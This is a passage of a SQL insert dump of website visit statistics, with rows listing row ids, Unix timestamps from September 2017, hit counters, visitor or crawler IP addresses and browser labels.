05111480,1,1,0,0,'37.54.22.131','chrome'),(155207,1505111582,1,1,0,0,'95.132.4.206','firefox'),(155208,1505111597,1,1,0,0,'94.153.192.46','firefox'),(155209,1505111705,1,1,0,0,'37.54.211.13','chrome'),(155210,1505111860,1,1,0,0,'217.182.132.92','other'),(155211,1505112157,1,1,0,0,'141.8.142.21','other'),(155212,1505112323,1,1,0,0,'217.182.132.180','other'),(155213,1505112501,1,1,0,0,'137.74.203.194','other'),(155214,1505112721,3,3,0,0,'5.45.207.64','other'),(155215,1505112937,1,1,0,0,'37.52.18.130','chrome'),(155216,1505112985,2,2,0,0,'141.8.183.1','other'),(155217,1505113054,1,1,0,0,'91.196.177.96','chrome'),(155218,1505113190,1,1,0,0,'217.182.132.83','other'),(155219,1505113222,1,1,0,0,'46.164.159.124','chrome'),(155220,1505113283,1,1,0,0,'107.167.109.150','opera'),(155221,1505113558,1,1,0,0,'91.196.178.65','chrome'),(155222,1505113885,1,1,0,0,'5.45.207.64','other'),(155223,1505113930,1,1,0,0,'213.180.203.32','other'),(155224,1505113994,1,1,0,0,'66.249.76.107','chrome'),(155225,1505114147,1,1,0,0,'51.255.64.106','other'),(155226,1505114363,1,1,0,0,'51.255.65.50','other'),(155227,1505114374,1,1,0,0,'217.182.132.77','other'),(155228,1505114715,1,1,0,0,'91.196.177.128','chrome'),(155229,1505114744,1,1,0,0,'217.182.132.4','other'),(155230,1505114773,1,1,0,0,'176.120.38.134','chrome'),(155231,1505115233,1,1,0,0,'94.153.192.46','firefox'),(155232,1505115322,1,1,0,0,'178.154.200.7','other'),(155233,1505115502,1,1,0,0,'37.115.143.90','chrome'),(155234,1505115511,1,1,0,0,'77.222.155.89','chrome'),(155235,1505115597,1,1,0,0,'107.167.102.130','opera'),(155236,1505115960,1,0,1,0,'66.249.76.89',''),(155237,1505115985,1,1,0,0,'137.74.207.116','other'),(155238,1505116194,1,1,0,0,'40.77.167.48','other'),(155239,1505116425,1,1,0,0,'157.55.39.168','other'),(155240,1505116814,1,1,0,0,'80.93.126.34','chrome'),(155241,1505116995,1,1,0,0,'91.196.178.69','chrome'),(155242,1505117204,1,1,0,0,'91.196.178.70','firefox'),(155243,1505117333,1,1,0,0,'217.69.133.218','other'),(155244,1505117575,1,1,0,0,'107.167.106.244','opera'),(155245,1505117599,1,1,0,0,'5.45.207.32','other'),(155246,1505118005,1,1,0,0,'91.196.178.67','chrome'),(155247,1505118214,1,1,0,0,'91.196.179.138','firefox'),(155248,1505118415,1,1,0,0,'37.55.175.184','chrome'),(155249,1505118505,7,7,0,0,'5.189.155.127','other'),(155250,1505119254,1,1,0,0,'185.137.18.237','chrome'),(155251,1505119259,1,1,0,0,'91.196.178.164','chrome'),(155252,1505119439,2,2,0,0,'91.209.11.236','other'),(155253,1505119453,1,1,0,0,'91.196.178.130','firefox'),(155254,1505119699,2,2,0,0,'54.165.59.7','other'),(155255,1505119862,1,1,0,0,'107.167.106.244','opera'),(155256,1505120026,1,1,0,0,'91.196.178.70','firefox'),(155257,1505120091,1,1,0,0,'141.8.183.1','other'),(155258,1505120266,1,1,0,0,'8.29.198.26','other'),(155259,1505120459,1,1,0,0,'93.171.251.70','opera'),(155260,1505120631,1,1,0,0,'23.111.19.182','chrome'),(155261,1505120751,1,1,0,0,'91.196.178.100','firefox'),(155262,1505120955,1,1,0,0,'31.43.10.41','chrome'),(155263,1505121205,1,1,0,0,'5.45.207.64','other'),(155264,1505121244,1,1,0,0,'157.55.39.185','other'),(155265,1505121380,12,12,0,0,'142.4.200.37','other'),(155266,1505121504,1,1,0,0,'93.171.251.70','opera'),(155267,1505122131,1,0,1,0,'66.249.76.107',''),(155268,1505122364,1,1,0,0,'5.45.207.64','other'),(155269,1505122380,1,1,0,0,'94.153.220.194','chrome'),(155270,1505122605,1,0,1,0,'66.249.66.157',''),(155271,1505122688,1,1,0,0,'217.69.133.219','other'),(155272,1505123188,1,1,0,0,'141.8.183.1','other'),(155273,1505123258,1,1,0,0,'46.201.186.79','opera'),(155274,1505123378,1,0,1,0,'66.249.66.76',''),(155275,1505123676,2,2,0,0,'141.8.142.21','other'),(155276,1505123927,1,1,0,0,'107.167.106.64','opera'),(155277,1505124029,1,1,0,0,'217.69.133.217','other'),(155278,1505124030,1,1,0,0,'217.69.133.84','other'),(155279,1505124035,1,1,0,0,'91.196.178.70','firefox'),(155280,1505125606,1,1,0,0,'141.8.142.21','other'),(155281,1505125750,1,1,0,0,'107.167.106.64','opera'),(155282,1505125963,2,2,0,0,'141.8.183.1','other'),(155283,1505126099,1,1,0,0,'91.196.179.25','chrome'),(155284,1505126114,1,0,1,0,'66.249.76.93',''),(155285,1505126640,1,1,0,0,'141.8.142.21','other'),(155286,1505126964,1,1,0,0,'80.91.174.90','other'),(155287,1505127165,2,0,2,0,'66.249.76.93',''),(155288,1505127395,1,1,0,0,'141.8.183.1','other'),(155289,1505127426,1,1,0,0,'217.69.133.223','other'),(155290,1505127582,1,1,0,0,'213.180.203.32','other'),(155291,1505127593,1,1,0,0,'91.196.178.36','chrome'),(155292,1505127660,1,1,0,0,'95.132.33.87','chrome'),(155293,1505127787,1,1,0,0,'107.167.106.64','opera'),(155294,1505128121,1,1,0,0,'5.45.207.64','other'),(155295,1505128291,1,1,0,0,'141.8.183.5','other'),(155296,1505128393,1,1,0,0,'91.196.178.71','chrome'),(155297,1505128842,3,3,0,0,'5.45.207.32','other'),(155298,1505129196,1,1,0,0,'217.182.132.97','other'),(155299,1505129260,1,1,0,0,'141.8.183.1','other'),(155300,1505129370,1,1,0,0,'51.255.65.51','other'),(155301,1505129380,1,1,0,0,'188.166.37.114','chrome'),(155302,1505129489,3,3,0,0,'178.154.200.7','other'),(155303,1505129511,1,1,0,0,'213.180.203.32','other'),(155304,1505129649,1,1,0,0,'92.112.229.200','chrome'),(155305,1505130106,2,2,0,0,'5.45.207.32','other'),(155306,1505130418,1,1,0,0,'217.182.132.34','other'),(155307,1505130509,1,1,0,0,'91.196.178.164','chrome'),(155308,1505130704,1,1,0,0,'141.8.142.21','other'),(155309,1505131098,1,1,0,0,'8.29.198.26','other'),(155310,1505131153,1,1,0,0,'217.182.132.20','other'),(155311,1505131206,1,1,0,0,'137.74.207.116','other'),(155312,1505131382,1,1,0,0,'91.196.178.66','chrome'),(155313,1505131537,2,2,0,0,'5.45.207.32','other'),(155314,1505132204,1,1,0,0,'66.102.9.25','chrome'),(155315,1505132230,1,1,0,0,'51.255.65.83','other'),(155316,1505132363,1,1,0,0,'164.132.162.156','other'),(155317,1505132447,1,1,0,0,'217.182.132.170','other'),(155318,1505132812,1,1,0,0,'95.108.181.69','other'),(155319,1505132846,1,1,0,0,'141.8.183.1','other'),(155320,1505133082,1,1,0,0,'91.196.179.134','chrome'),(155321,1505133128,1,1,0,0,'217.69.143.217','firefox'),(155322,1505133271,1,1,0,0,'217.182.132.183','other'),(155323,1505133406,1,1,0,0,'141.8.142.21','other'),(155324,1505133996,1,1,0,0,'81.1.242.33','other'),(155325,1505134013,1,1,0,0,'107.167.104.86','opera'),(155326,1505134151,1,1,0,0,'91.196.177.46','chrome'),(155327,1505134490,1,1,0,0,'77.222.134.100','firefox'),(155328,1505134520,1,1,0,0,'91.196.178.131','chrome'),(155329,1505134600,1,1,0,0,'217.69.133.203','other'),(155330,1505134680,1,0,1,0,'66.249.76.89',''),(155331,1505134711,1,0,1,0,'66.249.66.74',''),(155332,1505134911,1,1,0,0,'141.8.183.1','other'),(155333,1505135140,1,1,0,0,'91.196.179.138','firefox'),(155334,1505135193,1,1,0,0,'37.52.23.54','firefox'),(155335,1505135442,3,3,0,0,'91.209.11.236','other'),(155336,1505135651,1,1,0,0,'91.196.177.46','chrome'),(155337,1505135663,1,1,0,0,'51.255.71.133','other'),(155338,1505135677,1,1,0,0,'217.69.133.2','other'),(155339,1505135920,1,1,0,0,'5.45.207.64','other'),(155340,1505136041,1,0,1,0,'66.249.76.91',''),(155341,1505136888,1,1,0,0,'141.8.142.21','other'),(155342,1505137093,1,1,0,0,'82.207.29.11','chrome'),(155343,1505137234,1,1,0,0,'217.182.132.185','other'),(155344,1505137344,3,3,0,0,'5.45.207.64','other'),(155345,1505137433,1,0,1,0,'66.249.76.108',''),(155346,1505137581,1,1,0,0,'91.196.177.46','chrome'),(155347,1505137606,1,1,0,0,'217.182.132.35','other'),(155348,1505137644,1,1,0,0,'51.255.65.96','other'),(155349,1505137676,1,1,0,0,'217.182.132.97','other'),(155350,1505137913,1,1,0,0,'83.218.235.148','chrome'),(155351,1505138236,1,1,0,0,'51.255.65.72','other'),(155352,1505138262,1,1,0,0,'91.124.181.1','chrome'),(155353,1505138506,1,1,0,0,'46.161.9.39','firefox'),(155354,1505138640,1,1,0,0,'217.182.132.7','other'),(155355,1505138734,1,1,0,0,'5.45.207.64','other'),(155356,1505138980,1,1,0,0,'31.43.3.181','chrome'),(155357,1505139001,1,1,0,0,'141.8.183.1','other'),(155358,1505139415,1,0,1,0,'66.249.76.109',''),(155359,1505139700,1,1,0,0,'51.255.65.50','other'),(155360,1505139763,1,1,0,0,'37.147.100.158','msie'),(155361,1505140152,1,0,1,0,'66.249.76.91',''),(155362,1505140238,1,1,0,0,'137.74.201.108','other'),(155363,1505140349,1,1,0,0,'217.182.132.36','other'),(155364,1505140355,1,1,0,0,'141.8.142.21','other'),(155365,1505140700,1,1,0,0,'95.133.99.140','chrome'),(155366,1505141102,1,1,0,0,'51.255.65.77','other'),(155367,1505141487,1,1,0,0,'180.76.15.160','other'),(155368,1505141507,2,2,0,0,'5.45.207.32','other'),(155369,1505141648,1,1,0,0,'217.182.132.176','other'),(155370,1505141905,1,1,0,0,'141.8.142.43','other'),(155371,1505141928,1,1,0,0,'8.29.198.25','other'),(155372,1505141999,1,1,0,0,'217.182.132.174','other'),(155373,1505142000,1,1,0,0,'137.74.207.188','other'),(155374,1505142204,1,1,0,0,'95.132.23.44','firefox'),(155375,1505142473,2,2,0,0,'141.8.183.1','other'),(155376,1505142579,1,1,0,0,'180.76.15.34','other'),(155377,1505142852,1,1,0,0,'141.8.142.21','other'),(155378,1505142859,1,1,0,0,'213.180.203.32','other'),(155379,1505142891,1,1,0,0,'217.182.132.59','other'),(155380,1505143017,1,0,1,0,'66.249.76.89',''),(155381,1505143027,1,0,1,0,'66.249.76.93',''),(155382,1505143032,1,0,1,0,'66.249.76.91',''),(155383,1505143065,1,1,0,0,'51.255.65.97','other'),(155384,1505143211,1,1,0,0,'217.182.132.147','other'),(155385,1505143337,1,1,0,0,'51.255.65.61','other'),(155386,1505143777,1,1,0,0,'164.132.162.153','other'),(155387,1505143870,1,1,0,0,'91.196.178.65','firefox'),(155388,1505144102,1,1,0,0,'141.8.142.21','other'),(155389,1505144109,1,1,0,0,'213.180.203.32','other'),(155390,1505144881,1,1,0,0,'217.182.132.83','other'),(155391,1505144980,1,1,0,0,'217.182.132.23','other'),(155392,1505145619,1,1,0,0,'217.182.132.7','other'),(155393,1505145924,1,1,0,0,'51.255.65.27','other'),(155394,1505145940,1,1,0,0,'92.113.157.228','chrome'),(155395,1505146140,1,1,0,0,'5.45.207.32','other'),(155396,1505146267,1,1,0,0,'217.182.132.155','other'),(155397,1505146378,1,1,0,0,'141.8.142.21','other'),(155398,1505146576,1,1,0,0,'141.8.183.1','other'),(155399,1505147025,5,5,0,0,'142.4.200.37','other'),(155400,1505147341,1,1,0,0,'81.1.242.33','other'),(155401,1505147402,1,1,0,0,'217.182.132.81','other'),(155402,1505147404,1,1,0,0,'51.255.65.23','other'),(155403,1505147525,22,22,0,0,'167.114.219.41','other'),(155404,1505147573,2,2,0,0,'5.45.207.64','other'),(155405,1505147766,1,1,0,0,'213.180.203.32','other'),(155406,1505148066,1,1,0,0,'162.210.196.129','other'),(155407,1505148486,1,1,0,0,'51.255.65.72','other'),(155408,1505148818,1,1,0,0,'91.196.178.33','chrome'),(155409,1505148937,1,1,0,0,'95.108.181.69','other'),(155410,1505149237,1,1,0,0,'5.45.207.64','other'),(155411,1505149248,1,1,0,0,'91.196.178.136','chrome'),(155412,1505149314,2,2,0,0,'213.180.203.32','other'),(155413,1505149331,2,2,0,0,'141.8.142.21','other'),(155414,1505149514,1,1,0,0,'157.55.39.168','other'),(155415,1505149909,1,1,0,0,'217.182.132.91','other'),(155416,1505150057,1,1,0,0,'37.54.22.131','chrome'),(155417,1505150269,1,1,0,0,'213.180.203.32','other'),(155418,1505150436,1,1,0,0,'217.182.132.66','other'),(155419,1505150550,1,1,0,0,'217.182.132.73','other'),(155420,1505150873,1,1,0,0,'51.255.65.7','other'),(155421,1505150926,1,1,0,0,'217.182.132.77','other'),(155422,1505151081,1,1,0,0,'141.8.183.1','other'),(155423,1505151141,2,2,0,0,'195.238.117.216','chrome'),(155424,1505151185,1,1,0,0,'217.182.132.22','other'),(155425,1505151191,1,1,0,0,'217.182.132.54','other'),(155426,1505151235,1,1,0,0,'51.255.65.70','other'),(155427,1505151344,1,1,0,0,'51.255.65.46','other'),(155428,1505151429,1,1,0,0,'217.182.132.151','other'),(155429,1505151826,1,1,0,0,'137.74.207.110','other'),(155430,1505152249,1,1,0,0,'51.255.71.122','other'),(155431,1505152512,1,1,0,0,'51.255.71.118','other'),(155432,1505152750,1,1,0,0,'8.29.198.27','other'),(155433,1505153181,1,1,0,0,'217.182.132.190','other'),(155434,1505153937,1,1,0,0,'141.8.142.21','other'),(155435,1505154135,2,2,0,0,'142.4.200.37','other'),(155436,1505154162,1,0,1,0,'66.249.76.89',''),(155437,1505154622,1,1,0,0,'95.132.47.252','chrome'),(155438,1505154713,1,0,1,0,'66.249.76.91',''),(155439,1505154938,1,1,0,0,'217.182.132.67','other'),(155440,1505155062,1,1,0,0,'51.255.65.13','other'),(155441,1505155306,1,1,0,0,'51.255.65.26','other'),(155442,1505155401,1,1,0,0,'51.255.65.17','other'),(155443,1505155650,1,1,0,0,'51.255.65.12','other'),(155444,1505155889,3,3,0,0,'5.45.207.64','other'),(155445,1505155981,1,0,1,0,'66.249.76.107',''),(155446,1505156013,1,1,0,0,'107.167.107.19','opera'),(155447,1505156060,1,1,0,0,'130.180.217.18','opera'),(155448,1505156343,1,1,0,0,'137.74.207.170','other'),(155449,1505156773,1,1,0,0,'141.8.183.1','other'),(155450,1505156918,1,1,0,0,'141.8.142.21','other'),(155451,1505157133,1,1,0,0,'217.182.132.64','other'),(155452,1505157750,1,1,0,0,'91.134.135.226','other'),(155453,1505157790,1,1,0,0,'107.167.108.100','opera'),(155454,1505157836,1,1,0,0,'46.133.83.61','chrome'),(155455,1505158423,1,1,0,0,'217.182.132.88','other'),(155456,1505158518,1,1,0,0,'164.132.162.160','other'),(155457,1505158777,1,1,0,0,'141.8.183.1','other'),(155458,1505158864,1,1,0,0,'5.45.207.32','other'),(155459,1505158937,1,1,0,0,'164.132.162.157','other'),(155460,1505158979,1,1,0,0,'217.182.132.176','other'),(155461,1505159070,2,2,0,0,'213.180.203.32','other'),(155462,1505159617,1,1,0,0,'107.167.105.10','opera'),(155463,1505160002,1,1,0,0,'91.209.11.236','other'),(155464,1505160107,1,1,0,0,'5.45.207.64','other'),(155465,1505160258,1,1,0,0,'217.182.132.70','other'),(155466,1505160304,1,1,0,0,'217.182.132.93','other'),(155467,1505160520,1,1,0,0,'157.55.39.168','other'),(155468,1505160663,1,1,0,0,'213.180.203.32','other'),(155469,1505160684,1,1,0,0,'217.182.132.17','other'),(155470,1505160692,1,1,0,0,'217.182.132.151','other'),(155471,1505160855,1,1,0,0,'51.255.65.65','other'),(155472,1505160959,1,1,0,0,'188.163.16.6','chrome'),(155473,1505161045,2,2,0,0,'141.8.183.1','other'),(155474,1505161169,1,1,0,0,'46.48.13.161','chrome'),(155475,1505161365,3,3,0,0,'141.8.142.21','other'),(155476,1505161951,1,1,0,0,'51.255.65.60','other'),(155477,1505162241,1,1,0,0,'217.182.132.155','other'),(155478,1505162309,1,0,1,0,'68.180.228.221',''),(155479,1505162653,1,1,0,0,'5.45.207.64','other'),(155480,1505163056,1,1,0,0,'141.8.183.1','other'),(155481,1505163580,1,1,0,0,'8.29.198.25','other'),(155482,1505163618,1,1,0,0,'51.255.65.53','other'),(155483,1505163678,1,1,0,0,'51.255.65.82','other'),(155484,1505164201,2,2,0,0,'5.45.207.64','other'),(155485,1505164229,1,1,0,0,'217.182.132.70','other'),(155486,1505164843,1,1,0,0,'217.182.132.149','other'),(155487,1505165017,1,1,0,0,'141.8.183.5','other'),(155488,1505165310,1,1,0,0,'178.154.200.7','other'),(155489,1505165665,2,2,0,0,'5.45.207.64','other'),(155490,1505165696,1,1,0,0,'137.74.207.170','other'),(155491,1505165854,1,1,0,0,'141.8.183.1','other'),(155492,1505166757,1,1,0,0,'217.182.132.150','other'),(155493,1505166824,1,0,1,0,'66.249.76.93',''),(155494,1505166866,1,1,0,0,'217.182.132.86','other'),(155495,1505166977,1,1,0,0,'157.55.39.168','other'),(155496,1505167276,1,1,0,0,'51.255.65.28','other'),(155497,1505167655,1,1,0,0,'91.209.11.236','other'),(155498,1505167706,1,1,0,0,'213.180.203.32','other'),(155499,1505167926,1,1,0,0,'51.255.65.32','other'),(155500,1505168288,1,1,0,0,'141.8.142.45','other'),(155501,1505168831,2,2,0,0,'141.8.183.1','other'),(155502,1505169185,1,1,0,0,'46.48.13.161','chrome'),(155503,1505169274,1,1,0,0,'141.8.142.56','other'),(155504,1505169426,2,2,0,0,'5.45.207.64','other'),(155505,1505169501,1,1,0,0,'5.45.207.32','other'),(155506,1505169507,1,1,0,0,'51.255.65.46','other'),(155507,1505169528,1,1,0,0,'137.74.207.159','other'),(155508,1505169559,1,1,0,0,'51.255.65.36','other'),(155509,1505169856,1,1,0,0,'51.255.65.59','other'),(155510,1505169875,1,1,0,0,'178.154.200.7','other'),(155511,1505169931,1,1,0,0,'217.182.132.55','other'),(155512,1505171464,1,1,0,0,'176.31.231.10','other'),(155513,1505171558,1,1,0,0,'51.255.71.126','other'),(155514,1505171671,1,1,0,0,'51.255.71.100','other'),(155515,1505172009,1,1,0,0,'5.45.207.64','other'),(155516,1505172296,1,1,0,0,'51.255.65.72','other'),(155517,1505173044,5,5,0,0,'5.45.207.64','other'),(155518,1505173159,1,1,0,0,'217.69.134.200','other'),(155519,1505173202,2,2,0,0,'141.8.183.1','other'),(155520,1505173277,1,1,0,0,'164.132.162.154','other'),(155521,1505173306,1,1,0,0,'141.8.142.45','other'),(155522,1505173352,1,1,0,0,'217.69.134.185','other'),(155523,1505173368,1,1,0,0,'217.182.132.75','other'),(155524,1505173540,1,1,0,0,'217.69.134.188','other'),(155525,1505173721,1,1,0,0,'46.28.93.163','chrome'),(155526,1505173810,1,1,0,0,'217.69.135.205','other'),(155527,1505174039,1,1,0,0,'217.69.134.183','other'),(155528,1505174333,1,1,0,0,'141.8.142.21','other'),(155529,1505174391,1,1,0,0,'217.69.135.38','other'),(155530,1505174412,1,1,0,0,'217.182.132.16','other'),(155531,1505174431,1,1,0,0,'8.29.198.26','other'),(155532,1505174641,1,1,0,0,'141.8.183.1','other'),(155533,1505176467,1,1,0,0,'46.48.13.161','chrome'),(155534,1505176776,1,1,0,0,'51.255.65.40','other'),(155535,1505176932,1,1,0,0,'141.8.142.21','other'),(155536,1505176975,1,1,0,0,'5.45.207.32','other'),(155537,1505177023,1,1,0,0,'141.8.183.1','other'),(155538,1505177141,1,1,0,0,'5.45.207.64','other'),(155539,1505177555,1,1,0,0,'217.182.132.185','other'),(155540,1505178084,1,1,0,0,'217.182.132.79','other'),(155541,1505178678,1,1,0,0,'40.77.167.48','other'),(155542,1505178744,1,1,0,0,'51.255.65.69','other'),(155543,1505179165,1,1,0,0,'213.180.203.32','other'),(155544,1505179170,1,1,0,0,'141.8.183.1','other'),(155545,1505179277,1,1,0,0,'164.132.162.157','other'),(155546,1505179339,1,1,0,0,'141.8.183.5','other'),(155547,1505179675,1,1,0,0,'51.255.71.98','other'),(155548,1505179915,1,0,1,0,'66.249.66.156',''),(155549,1505179964,1,1,0,0,'5.45.207.32','other'),(155550,1505179980,1,1,0,0,'51.255.71.112','other'),(155551,1505180266,1,1,0,0,'51.255.65.97','other'),(155552,1505180380,1,1,0,0,'217.182.132.52','other'),(155553,1505180489,1,1,0,0,'51.255.65.20','other'),(155554,1505180685,1,1,0,0,'51.255.65.27','other'),(155555,1505180723,1,1,0,0,'213.180.203.32','other'),(155556,1505180936,1,1,0,0,'91.196.178.135','chrome'),(155557,1505181233,2,2,0,0,'141.8.142.21','other'),(155558,1505181441,2,2,0,0,'5.45.207.64','other'),(155559,1505181460,1,1,0,0,'217.182.132.16','other'),(155560,1505181708,1,1,0,0,'5.45.207.32','other'),(155561,1505182439,1,1,0,0,'217.182.132.76','other'),(155562,1505182511,1,1,0,0,'40.77.167.48','other'),(155563,1505183048,1,1,0,0,'51.255.65.42','other'),(155564,1505183090,1,1,0,0,'51.255.71.111','other'),(155565,1505183145,1,1,0,0,'51.255.65.38','other'),(155566,1505183156,2,2,0,0,'141.8.183.1','other'),(155567,1505183252,1,1,0,0,'54.165.59.7','other'),(155568,1505183490,2,2,0,0,'5.45.207.64','other'),(155569,1505183701,1,1,0,0,'141.8.142.21','other'),(155570,1505183719,1,1,0,0,'77.41.94.47','chrome'),(155571,1505183983,1,1,0,0,'217.182.132.179','other'),(155572,1505184341,3,3,0,0,'95.158.189.118','other'),(155573,1505184536,1,1,0,0,'141.8.183.1','other'),(155574,1505184721,1,1,0,0,'5.45.207.32','other'),(155575,1505184934,2,2,0,0,'141.8.142.21','other'),(155576,1505185266,1,1,0,0,'8.29.198.27','other'),(155577,1505185423,1,1,0,0,'66.249.76.108','chrome'),(155578,1505186257,1,1,0,0,'40.77.167.48','other'),(155579,1505186495,1,1,0,0,'217.182.132.53','other'),(155580,1505186552,1,1,0,0,'51.255.65.46','other'),(155581,1505186982,1,1,0,0,'217.182.132.149','other'),(155582,1505188208,1,1,0,0,'217.182.132.52','other'),(155583,1505188580,1,1,0,0,'51.255.65.87','other'),(155584,1505188780,1,0,1,0,'66.249.66.155',''),(155585,1505189015,1,1,0,0,'66.249.76.107','chrome'),(155586,1505189181,1,1,0,0,'51.255.65.37','other'),(155587,1505189436,1,1,0,0,'185.137.19.58','chrome'),(155588,1505189938,1,1,0,0,'51.255.65.39','other'),(155589,1505190011,1,1,0,0,'51.255.65.93','other'),(155590,1505190232,1,1,0,0,'107.167.106.153','opera'),(155591,1505190613,1,0,1,0,'66.249.76.89',''),(155592,1505190944,1,1,0,0,'217.182.132.151','other'),(155593,1505190958,1,1,0,0,'157.55.39.168','other'),(155594,1505191104,1,0,1,0,'66.249.76.108',''),(155595,1505191737,1,1,0,0,'217.182.132.174','other'),(155596,1505191784,1,1,0,0,'217.182.132.32','other'),(155597,1505192132,1,1,0,0,'51.255.65.27','other'),(155598,1505192347,1,1,0,0,'91.196.178.67','firefox'),(155599,1505192735,1,1,0,0,'51.255.65.7','other'),(155600,1505192924,1,1,0,0,'217.182.132.187','other'),(155601,1505193102,1,1,0,0,'77.222.134.102','firefox'),(155602,1505193353,1,1,0,0,'217.182.132.95','other'),(155603,1505194278,1,1,0,0,'104.236.55.136','chrome'),(155604,1505194528,1,1,0,0,'51.255.65.83','other'),(155605,1505194579,1,1,0,0,'188.166.25.215','chrome'),(155606,1505194680,1,1,0,0,'91.196.178.33','chrome'),(155607,1505194684,1,1,0,0,'51.255.65.55','other'),(155608,1505194732,1,1,0,0,'95.134.212.213','chrome'),(155609,1505194977,1,1,0,0,'107.167.104.238','opera'),(155610,1505195326,1,1,0,0,'137.74.207.101','other'),(155611,1505195463,2,2,0,0,'91.196.177.46','chrome'),(155612,1505195643,1,1,0,0,'91.196.178.67','firefox'),(155613,1505195940,1,1,0,0,'91.196.178.71','chrome'),(155614,1505195993,1,1,0,0,'91.196.178.67','chrome'),(155615,1505196052,1,1,0,0,'66.249.76.109','chrome'),(155616,1505196096,2,2,0,0,'5.45.207.64','other'),(155617,1505196101,1,1,0,0,'8.29.198.26','other'),(155618,1505196253,1,1,0,0,'51.255.71.125','other'),(155619,1505196338,1,1,0,0,'95.132.63.243','chrome'),(155620,1505196418,1,1,0,0,'107.167.107.72','opera'),(155621,1505196690,1,1,0,0,'91.209.11.236','other'),(155622,1505196964,1,1,0,0,'216.244.66.237','other'),(155623,1505197274,1,1,0,0,'5.45.207.64','other'),(155624,1505197369,1,1,0,0,'141.8.183.1','other'),(155625,1505197575,1,0,1,0,'66.249.76.108',''),(155626,1505197576,1,1,0,0,'217.182.132.148','other'),(155627,1505197721,1,1,0,0,'91.209.11.236','other'),(155628,1505198272,1,1,0,0,'157.185.131.21','other'),(155629,1505198328,1,1,0,0,'217.182.132.78','other'),(155630,1505198655,1,1,0,0,'51.255.65.14','other'),(155631,1505198730,1,1,0,0,'217.182.132.31','other'),(155632,1505199010,1,1,0,0,'91.196.178.129','chrome'),(155633,1505199015,1,1,0,0,'91.196.178.72','chrome'),(155634,1505199111,1,1,0,0,'217.182.132.87','other'),(155635,1505199198,1,1,0,0,'91.196.177.46','chrome'),(155636,1505199266,3,3,0,0,'95.158.189.118','other'),(155637,1505199306,1,1,0,0,'213.133.163.18','firefox'),(155638,1505199335,3,3,0,0,'5.45.207.32','other'),(155639,1505199473,1,1,0,0,'91.196.178.131','chrome'),(155640,1505199616,1,1,0,0,'51.255.65.4','other'),(155641,1505199765,1,0,1,0,'66.249.76.109',''),(155642,1505199886,1,1,0,0,'141.8.142.21','other'),(155643,1505199910,1,1,0,0,'141.8.183.1','other'),(155644,1505199952,1,1,0,0,'51.255.65.8','other'),(155645,1505200108,1,1,0,0,'178.154.200.7','other'),(155646,1505200484,1,1,0,0,'217.182.132.29','other'),(155647,1505200489,1,1,0,0,'141.8.183.5','other'),(155648,1505200491,1,1,0,0,'51.255.65.11','other'),(155649,1505200541,1,1,0,0,'94.178.118.204','chrome'),(155650,1505200545,1,1,0,0,'91.209.11.236','other'),(155651,1505200589,1,1,0,0,'51.255.65.48','other'),(155652,1505200676,1,1,0,0,'180.76.15.138','other'),(155653,1505200743,1,1,0,0,'91.196.179.138','firefox'),(155654,1505200970,1,1,0,0,'5.45.207.64','other'),(155655,1505201297,2,2,0,0,'54.165.59.7','other'),(155656,1505201322,1,1,0,0,'141.8.142.21','other'),(155657,1505201374,1,1,0,0,'217.182.132.68','other'),(155658,1505201453,1,1,0,0,'5.45.207.32','other'),(155659,1505201885,1,1,0,0,'95.108.181.69','other'),(155660,1505202021,1,1,0,0,'51.255.71.131','other'),(155661,1505202082,1,1,0,0,'91.209.11.236','other'),(155662,1505202215,1,1,0,0,'188.166.91.5','firefox'),(155663,1505202217,1,1,0,0,'51.255.65.71','other'),(155664,1505202278,1,1,0,0,'54.165.59.7','other'),(155665,1505202340,1,1,0,0,'37.9.113.180','other'),(155666,1505202904,1,1,0,0,'5.45.207.64','other'),(155667,1505203365,1,1,0,0,'217.182.132.25','other'),(155668,1505203372,1,1,0,0,'164.132.162.153','other'),(155669,1505203434,1,1,0,0,'91.196.179.25','chrome'),(155670,1505203529,1,1,0,0,'91.196.178.67','firefox'),(155671,1505203574,1,1,0,0,'217.182.132.184','other'),(155672,1505203633,1,1,0,0,'91.196.178.38','chrome'),(155673,1505203795,1,1,0,0,'51.255.65.36','other'),(155674,1505204037,1,1,0,0,'51.255.71.127','other'),(155675,1505204052,1,1,0,0,'37.54.22.131','chrome'),(155676,1505204298,1,1,0,0,'91.196.177.46','chrome'),(155677,1505204487,1,1,0,0,'217.182.132.22','other'),(155678,1505204528,1,1,0,0,'5.45.207.32','other'),(155679,1505204811,1,1,0,0,'91.196.178.71','chrome'),(155680,1505205180,1,1,0,0,'66.102.9.27','chrome'),(155681,1505205232,1,1,0,0,'51.255.65.63','other'),(155682,1505205406,2,2,0,0,'5.45.207.64','other'),(155683,1505205485,1,1,0,0,'178.150.224.88','chrome'),(155684,1505205677,1,1,0,0,'141.8.183.1','other'),(155685,1505205780,1,1,0,0,'107.167.104.16','opera'),(155686,1505206197,1,1,0,0,'51.255.65.77','other'),(155687,1505206339,1,0,1,0,'66.249.76.107',''),(155688,1505206370,1,1,0,0,'213.180.203.32','other'),(155689,1505206631,1,1,0,0,'37.54.22.131','chrome'),(155690,1505206932,1,1,0,0,'8.29.198.27','other'),(155691,1505207033,2,2,0,0,'141.8.142.21','other'),(155692,1505207082,1,1,0,0,'173.252.88.85','other'),(155693,1505207089,1,1,0,0,'173.252.84.113','other'),(155694,1505207127,1,1,0,0,'173.252.84.90','other'),(155695,1505207270,1,1,0,0,'217.182.132.6','other'),(155696,1505207284,1,1,0,0,'217.182.132.91','other'),(155697,1505207611,1,1,0,0,'91.196.179.138','firefox'),(155698,1505207776,1,1,0,0,'91.196.178.71','chrome'),(155699,1505207790,1,1,0,0,'107.167.107.243','chrome'),(155700,1505207792,1,1,0,0,'107.167.107.243','opera'),(155701,1505207799,1,1,0,0,'107.167.107.243','other'),(155702,1505207816,1,1,0,0,'173.252.88.87','other'),(155703,1505207849,1,1,0,0,'217.182.132.73','other'),(155704,1505207905,1,1,0,0,'91.196.177.15','chrome'),(155705,1505208040,1,1,0,0,'51.255.65.3','other'),(155706,1505208345,1,1,0,0,'46.211.101.172','chrome'),(155707,1505208444,1,1,0,0,'95.132.63.243','msie'),(155708,1505208562,1,1,0,0,'51.255.65.16','other'),(155709,1505208809,1,1,0,0,'79.49.126.153','other'),(155710,1505208919,1,1,0,0,'87.76.247.84','chrome'),(155711,1505208990,1,1,0,0,'217.182.132.33','other'),(155712,1505209015,1,0,1,0,'66.249.76.108',''),(155713,1505209290,1,1,0,0,'107.167.104.163','opera'),(155714,1505209499,1,1,0,0,'137.74.207.110','other'),(155715,1505209571,1,1,0,0,'217.182.132.6','other'),(155716,1505